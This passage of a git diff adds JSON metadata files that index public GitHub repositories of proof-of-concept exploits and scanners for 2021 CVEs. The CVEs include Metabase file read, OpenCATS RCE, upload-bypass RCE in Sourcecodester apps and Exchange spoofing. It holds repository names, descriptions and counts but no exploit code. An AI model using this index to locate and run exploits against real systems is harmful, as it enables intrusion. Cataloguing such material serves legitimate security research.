0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41182.json b/2021/CVE-2021-41182.json new file mode 100644 index 0000000000..d08727e06b --- /dev/null +++ b/2021/CVE-2021-41182.json @@ -0,0 +1,64 @@ +[ + { + "id": 838261340, + "name": "CVE-2021-41182", + "full_name": "aredspy\/CVE-2021-41182", + "owner": { + "login": "aredspy", + "id": 106393710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106393710?v=4", + "html_url": "https:\/\/github.com\/aredspy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aredspy\/CVE-2021-41182", + "description": null, + "fork": false, + "created_at": "2024-08-05T09:27:56Z", + "updated_at": "2024-08-05T09:27:57Z", + "pushed_at": "2024-08-05T09:27:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838262530, + "name": "CVE-2021-41182-Tester", + "full_name": "aredspy\/CVE-2021-41182-Tester", + "owner": { + "login": "aredspy", + "id": 106393710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106393710?v=4", + "html_url": "https:\/\/github.com\/aredspy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aredspy\/CVE-2021-41182-Tester", + "description": "Some test files to make a good nuclei template for a JQuery UI XSS vuln", + "fork": false, + "created_at": "2024-08-05T09:31:05Z", + "updated_at": "2024-08-05T22:56:29Z", + "pushed_at": "2024-08-05T22:56:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41184.json b/2021/CVE-2021-41184.json new file mode 100644 index 0000000000..59ff046973 --- /dev/null +++ b/2021/CVE-2021-41184.json @@ -0,0 +1,33 @@ +[ + { + "id": 481619824, + "name": "Exploit-Medium-CVE-2021-41184", + "full_name": "gabrielolivra\/Exploit-Medium-CVE-2021-41184", + "owner": { + "login": "gabrielolivra", + "id": 89982150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89982150?v=4", + "html_url": "https:\/\/github.com\/gabrielolivra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gabrielolivra\/Exploit-Medium-CVE-2021-41184", + "description": null, + "fork": false, + "created_at": "2022-04-14T13:42:54Z", + "updated_at": "2024-04-11T20:02:38Z", + "pushed_at": "2022-08-30T16:02:36Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41277.json b/2021/CVE-2021-41277.json new file mode 100644 index 0000000000..19bc3b5bb4 --- /dev/null +++ b/2021/CVE-2021-41277.json @@ -0,0 +1,385 @@ +[ + { + "id": 430342146, + "name": "CVE-2021-41277", + "full_name": "Seals6\/CVE-2021-41277", + "owner": { + "login": "Seals6", + "id": 49613759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49613759?v=4", + "html_url": "https:\/\/github.com\/Seals6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Seals6\/CVE-2021-41277", + "description": "Metabase任意文件读取漏洞批量扫描工具", + "fork": false, + "created_at": "2021-11-21T11:04:44Z", + "updated_at": "2024-08-12T20:18:15Z", + "pushed_at": "2021-11-22T11:42:32Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-41277" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 430348963, + "name": "CVE-2021-41277", + "full_name": "tahtaciburak\/CVE-2021-41277", + "owner": { + "login": "tahtaciburak", + "id": 16239725, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16239725?v=4", + "html_url": "https:\/\/github.com\/tahtaciburak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tahtaciburak\/CVE-2021-41277", + "description": "PoC for CVE-2021-41277", + "fork": false, + "created_at": "2021-11-21T11:38:08Z", + "updated_at": "2024-08-12T20:18:15Z", + "pushed_at": "2021-11-25T21:10:41Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-41277", + "poc" + ], + "visibility": "public", + "forks": 9, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 430542078, + "name": "Metabase-cve-2021-41277", + "full_name": "Henry4E36\/Metabase-cve-2021-41277", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/Metabase-cve-2021-41277", + "description": " Metabase 任意文件读取", + "fork": false, + "created_at": "2021-11-22T02:51:49Z", + "updated_at": "2021-11-22T02:55:29Z", + "pushed_at": "2021-11-22T02:55:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 430704302, + "name": "CVE-2021-41277", + "full_name": "kap1ush0n\/CVE-2021-41277", + "owner": { + "login": "kap1ush0n", + "id": 94843370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94843370?v=4", + "html_url": "https:\/\/github.com\/kap1ush0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kap1ush0n\/CVE-2021-41277", + "description": "MetaBase 任意文件读取漏洞 fofa批量poc", + "fork": false, + "created_at": "2021-11-22T12:49:42Z", + "updated_at": "2021-11-22T12:50:17Z", + "pushed_at": "2021-11-22T12:50:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 430814901, + "name": "CVE-2021-41277", + "full_name": "z3n70\/CVE-2021-41277", + "owner": { + "login": "z3n70", + "id": 39817707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39817707?v=4", + "html_url": "https:\/\/github.com\/z3n70", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3n70\/CVE-2021-41277", + "description": "simple program for exploit metabase", + "fork": false, + "created_at": "2021-11-22T18:06:11Z", + "updated_at": "2024-01-19T16:01:47Z", + "pushed_at": "2021-11-22T23:12:33Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cybersecurity", + "exploit", + "metabase", + "ruby" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 430985632, + "name": "CVE-2021-41277", + "full_name": "kaizensecurity\/CVE-2021-41277", + "owner": { + "login": "kaizensecurity", + "id": 50189722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50189722?v=4", + "html_url": "https:\/\/github.com\/kaizensecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaizensecurity\/CVE-2021-41277", + "description": "plugin made for LeakiX", + "fork": false, + "created_at": "2021-11-23T06:24:16Z", + "updated_at": "2021-11-24T19:49:07Z", + "pushed_at": "2021-11-24T19:49:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 431203570, + "name": "Metabase_CVE-2021-41277", + "full_name": "Vulnmachines\/Metabase_CVE-2021-41277", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Metabase_CVE-2021-41277", + "description": null, + "fork": false, + "created_at": "2021-11-23T18:01:23Z", + "updated_at": "2022-01-10T03:07:08Z", + "pushed_at": "2022-07-26T05:21:06Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431364503, + "name": "CVE-2021-41277", + "full_name": "TheLastVvV\/CVE-2021-41277", + "owner": { + "login": "TheLastVvV", + "id": 71128830, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71128830?v=4", + "html_url": "https:\/\/github.com\/TheLastVvV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheLastVvV\/CVE-2021-41277", + "description": "Metabase GeoJSON map local file inclusion", + "fork": false, + "created_at": "2021-11-24T05:56:46Z", + "updated_at": "2021-11-24T06:02:34Z", + "pushed_at": "2021-11-24T06:02:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 435423428, + "name": "CVE-2021-41277", + "full_name": "zer0yu\/CVE-2021-41277", + "owner": { + "login": "zer0yu", + "id": 16551733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16551733?v=4", + "html_url": "https:\/\/github.com\/zer0yu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zer0yu\/CVE-2021-41277", + "description": null, + "fork": false, + "created_at": "2021-12-06T08:52:32Z", + "updated_at": "2023-08-09T19:14:29Z", + "pushed_at": "2021-12-06T10:23:45Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 449795168, + "name": "Metabase_Nmap_Script", + "full_name": "frknktlca\/Metabase_Nmap_Script", + "owner": { + "login": "frknktlca", + "id": 39772097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39772097?v=4", + "html_url": "https:\/\/github.com\/frknktlca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/frknktlca\/Metabase_Nmap_Script", + "description": "It is a nmap script for metabase vulnerability (CVE-2021-41277)", + "fork": false, + "created_at": "2022-01-19T17:43:38Z", + "updated_at": "2022-01-19T17:44:35Z", + "pushed_at": "2022-01-19T17:52:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468638331, + "name": "CVE-2021-41277", + "full_name": "chengling-ing\/CVE-2021-41277", + "owner": { + "login": "chengling-ing", + "id": 76235286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76235286?v=4", + "html_url": "https:\/\/github.com\/chengling-ing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chengling-ing\/CVE-2021-41277", + "description": "MetaBase 任意文件读取", + "fork": false, + "created_at": "2022-03-11T06:39:38Z", + "updated_at": "2022-08-25T14:19:45Z", + "pushed_at": "2022-03-11T07:48:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 632067353, + "name": "PoC-Metabase-CVE-2021-41277", + "full_name": "RubXkuB\/PoC-Metabase-CVE-2021-41277", + "owner": { + "login": "RubXkuB", + "id": 104125912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104125912?v=4", + "html_url": "https:\/\/github.com\/RubXkuB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RubXkuB\/PoC-Metabase-CVE-2021-41277", + "description": null, + "fork": false, + "created_at": "2023-04-24T16:34:13Z", + "updated_at": "2023-09-13T09:44:36Z", + "pushed_at": "2023-10-19T10:55:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41338.json b/2021/CVE-2021-41338.json new file mode 100644 index 0000000000..297ce7610c --- /dev/null +++ b/2021/CVE-2021-41338.json @@ -0,0 +1,33 @@ +[ + { + "id": 472963061, + "name": "firewall-cve", + "full_name": "Mario-Kart-Felix\/firewall-cve", + "owner": { + "login": "Mario-Kart-Felix", + "id": 76971465, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76971465?v=4", + "html_url": "https:\/\/github.com\/Mario-Kart-Felix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mario-Kart-Felix\/firewall-cve", + "description": "Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability CVE-2021-41338 Security Vulnerability Released: Oct 12, 2021 Assigning CNA: Microsoft MITRE CVE-2021-41338 CVSS:3.1 5.5 \/ 5.0 Attack Vector Local Attack Complexity Low Privileges Required Low User Interaction None Scope Unchanged Confidentiality High Integrity None Availability None Exploit Code Maturity Proof-of-Concept Remediation Level Official Fix Report Confidence Confirmed Please see Common Vulnerability Scoring System for more information on the definition of these metrics. Exploitability The following table provides an exploitability assessment for this vulnerability at the time of original publication. Yes No Exploitation Less Likely", + "fork": false, + "created_at": "2022-03-22T22:53:32Z", + "updated_at": "2022-03-22T22:56:29Z", + "pushed_at": "2022-03-29T02:29:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41349.json b/2021/CVE-2021-41349.json new file mode 100644 index 0000000000..99459d624f --- /dev/null +++ b/2021/CVE-2021-41349.json @@ -0,0 +1,33 @@ +[ + { + "id": 519490745, + "name": "CVE-2021-41349", + "full_name": "0xrobiul\/CVE-2021-41349", + "owner": { + "login": "0xrobiul", + "id": 100078094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100078094?v=4", + "html_url": "https:\/\/github.com\/0xrobiul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xrobiul\/CVE-2021-41349", + "description": "Microsoft Exchange Server Spoofing Vulnerability Exploit!", + "fork": false, + "created_at": "2022-07-30T10:51:55Z", + "updated_at": "2024-09-25T02:24:56Z", + "pushed_at": "2023-12-26T19:55:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41351.json b/2021/CVE-2021-41351.json new file mode 100644 index 0000000000..f0e0ad32fd --- /dev/null +++ b/2021/CVE-2021-41351.json @@ -0,0 +1,33 @@ +[ + { + "id": 427883778, + "name": "CVE-2021-41351-POC", + "full_name": "JaneMandy\/CVE-2021-41351-POC", + "owner": { + "login": "JaneMandy", + "id": 36792635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4", + "html_url": "https:\/\/github.com\/JaneMandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2021-41351-POC", + "description": "CVE-2021-41351-poc", + "fork": false, + "created_at": "2021-11-14T09:14:56Z", + "updated_at": "2021-11-14T09:14:59Z", + "pushed_at": "2021-11-14T09:14:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41381.json b/2021/CVE-2021-41381.json new file mode 100644 index 0000000000..134f304a11 --- /dev/null +++ b/2021/CVE-2021-41381.json @@ -0,0 +1,33 @@ +[ + { + "id": 414862526, + "name": "CVE-2021-41381", + "full_name": "Net-hunter121\/CVE-2021-41381", + "owner": { + "login": "Net-hunter121", + "id": 83981655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83981655?v=4", + "html_url": "https:\/\/github.com\/Net-hunter121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Net-hunter121\/CVE-2021-41381", + "description": "I have come-up with a POC for Payara Micro Community 5.2021.6 - Directory Traversal, Please refer above reference field.", + "fork": false, + "created_at": "2021-10-08T05:52:20Z", + "updated_at": "2022-05-06T12:00:55Z", + "pushed_at": "2021-10-08T05:54:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41511.json b/2021/CVE-2021-41511.json new file mode 100644 index 0000000000..57cce1eeb0 --- /dev/null +++ b/2021/CVE-2021-41511.json @@ -0,0 +1,33 @@ +[ + { + "id": 412766915, + "name": "CVE-2021-41511", + "full_name": "vidvansh\/CVE-2021-41511", + "owner": { + "login": "vidvansh", + "id": 56179464, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56179464?v=4", + "html_url": "https:\/\/github.com\/vidvansh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidvansh\/CVE-2021-41511", + "description": null, + "fork": false, + "created_at": "2021-10-02T10:44:59Z", + "updated_at": "2021-10-02T10:46:57Z", + "pushed_at": "2021-10-02T10:46:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-4154.json b/2021/CVE-2021-4154.json new file mode 100644 index 0000000000..d4cac57858 --- /dev/null +++ b/2021/CVE-2021-4154.json @@ -0,0 +1,64 @@ +[ + { + "id": 523600435, + "name": "CVE-2021-4154", + "full_name": "Markakd\/CVE-2021-4154", + "owner": { + "login": "Markakd", + "id": 18663141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18663141?v=4", + "html_url": "https:\/\/github.com\/Markakd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Markakd\/CVE-2021-4154", + "description": "CVE-2021-4154 exploit", + "fork": false, + "created_at": "2022-08-11T05:46:27Z", + "updated_at": "2024-09-24T16:59:16Z", + "pushed_at": "2022-10-07T04:56:36Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 65, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 605477469, + "name": "CVE-2021-4154", + "full_name": "veritas501\/CVE-2021-4154", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2021-4154", + "description": "CVE-2021-4154", + "fork": false, + "created_at": "2023-02-23T08:38:22Z", + "updated_at": "2023-05-22T23:46:48Z", + "pushed_at": "2023-03-02T07:22:57Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41560.json b/2021/CVE-2021-41560.json new file mode 100644 index 0000000000..0e2570deb6 --- /dev/null +++ b/2021/CVE-2021-41560.json @@ -0,0 +1,33 @@ +[ + { + "id": 426630936, + "name": "RevCAT", + "full_name": "Nickguitar\/RevCAT", + "owner": { + "login": "Nickguitar", + "id": 3837916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3837916?v=4", + "html_url": "https:\/\/github.com\/Nickguitar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nickguitar\/RevCAT", + "description": "OpenCATS <= 0.9.4 RCE (CVE-2021-41560)", + "fork": false, + "created_at": "2021-11-10T13:24:01Z", + "updated_at": "2024-08-22T13:00:21Z", + "pushed_at": "2021-12-10T16:19:37Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41643.json b/2021/CVE-2021-41643.json new file mode 100644 index 0000000000..e04ea814e1 --- /dev/null +++ b/2021/CVE-2021-41643.json @@ -0,0 +1,33 @@ +[ + { + "id": 422727442, + "name": "CVE-2021-41643", + "full_name": "hax3xploit\/CVE-2021-41643", + "owner": { + "login": "hax3xploit", + "id": 24190623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190623?v=4", + "html_url": "https:\/\/github.com\/hax3xploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hax3xploit\/CVE-2021-41643", + "description": "Remote Code Execution (RCE) vulnerability exists in Sourcecodester Church Management System 1.0 via the image upload field.", + "fork": false, + "created_at": "2021-10-29T22:24:42Z", + "updated_at": "2021-10-29T22:27:10Z", + "pushed_at": "2021-10-29T22:27:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41644.json b/2021/CVE-2021-41644.json new file mode 100644 index 0000000000..227ce8bfef --- /dev/null +++ b/2021/CVE-2021-41644.json @@ -0,0 +1,33 @@ +[ + { + "id": 422728006, + "name": "CVE-2021-41644", + "full_name": "hax3xploit\/CVE-2021-41644", + "owner": { + "login": "hax3xploit", + "id": 24190623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190623?v=4", + "html_url": "https:\/\/github.com\/hax3xploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hax3xploit\/CVE-2021-41644", + "description": "Remote Code Exection (RCE) vulnerability exists in Sourcecodester Online Food Ordering System 2.0 via a maliciously crafted PHP file that bypasses the image upload filters.", + "fork": false, + "created_at": "2021-10-29T22:28:01Z", + "updated_at": "2021-10-29T22:29:17Z", + "pushed_at": "2021-10-29T22:29:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41645.json b/2021/CVE-2021-41645.json new file mode 100644 index 0000000000..8a75f08205 --- /dev/null +++ b/2021/CVE-2021-41645.json @@ -0,0 +1,33 @@ +[ + { + "id": 422728380, + "name": "CVE-2021-41645", + "full_name": "hax3xploit\/CVE-2021-41645", + "owner": { + "login": "hax3xploit", + "id": 24190623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190623?v=4", + "html_url": "https:\/\/github.com\/hax3xploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hax3xploit\/CVE-2021-41645", + "description": "Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field. ", + "fork": false, + "created_at": "2021-10-29T22:30:21Z", + "updated_at": "2021-10-29T22:31:02Z", + "pushed_at": "2021-10-29T22:31:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41646.json b/2021/CVE-2021-41646.json new file mode 100644 index 0000000000..09e01cb406 --- /dev/null +++ b/2021/CVE-2021-41646.json @@ -0,0 +1,33 @@ +[ + { + "id": 422728610, + "name": "CVE-2021-41646", + "full_name": "hax3xploit\/CVE-2021-41646", + "owner": { + "login": "hax3xploit", + "id": 24190623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190623?v=4", + "html_url": "https:\/\/github.com\/hax3xploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hax3xploit\/CVE-2021-41646", + "description": "Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters..", + "fork": false, + "created_at": "2021-10-29T22:31:32Z", + "updated_at": "2023-12-09T00:12:15Z", + "pushed_at": "2021-10-29T22:32:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41647.json b/2021/CVE-2021-41647.json new file mode 100644 index 0000000000..de3ec0cd8a --- /dev/null +++ b/2021/CVE-2021-41647.json @@ -0,0 +1,33 @@ +[ + { + "id": 411188978, + "name": "CVE-2021-41647", + "full_name": "MobiusBinary\/CVE-2021-41647", + "owner": { + "login": "MobiusBinary", + "id": 91082958, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91082958?v=4", + "html_url": "https:\/\/github.com\/MobiusBinary", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MobiusBinary\/CVE-2021-41647", + "description": null, + "fork": false, + "created_at": "2021-09-28T07:59:21Z", + "updated_at": "2021-10-01T14:29:04Z", + "pushed_at": "2021-10-01T14:29:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41648.json b/2021/CVE-2021-41648.json new file mode 100644 index 0000000000..ae0ae27390 --- /dev/null +++ b/2021/CVE-2021-41648.json @@ -0,0 +1,33 @@ +[ + { + "id": 411945715, + "name": "CVE-2021-41648", + "full_name": "MobiusBinary\/CVE-2021-41648", + "owner": { + "login": "MobiusBinary", + "id": 91082958, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91082958?v=4", + "html_url": "https:\/\/github.com\/MobiusBinary", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MobiusBinary\/CVE-2021-41648", + "description": null, + "fork": false, + "created_at": "2021-09-30T06:16:30Z", + "updated_at": "2021-10-01T13:50:36Z", + "pushed_at": "2021-10-01T13:50:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41649.json b/2021/CVE-2021-41649.json new file mode 100644 index 0000000000..582d781efe --- /dev/null +++ b/2021/CVE-2021-41649.json @@ -0,0 +1,33 @@ +[ + { + "id": 411700383, + "name": "CVE-2021-41649", + "full_name": "MobiusBinary\/CVE-2021-41649", + "owner": { + "login": "MobiusBinary", + "id": 91082958, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91082958?v=4", + "html_url": "https:\/\/github.com\/MobiusBinary", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MobiusBinary\/CVE-2021-41649", + "description": null, + "fork": false, + "created_at": "2021-09-29T14:09:34Z", + "updated_at": "2021-10-01T13:51:00Z", + "pushed_at": "2021-10-01T13:50:58Z", 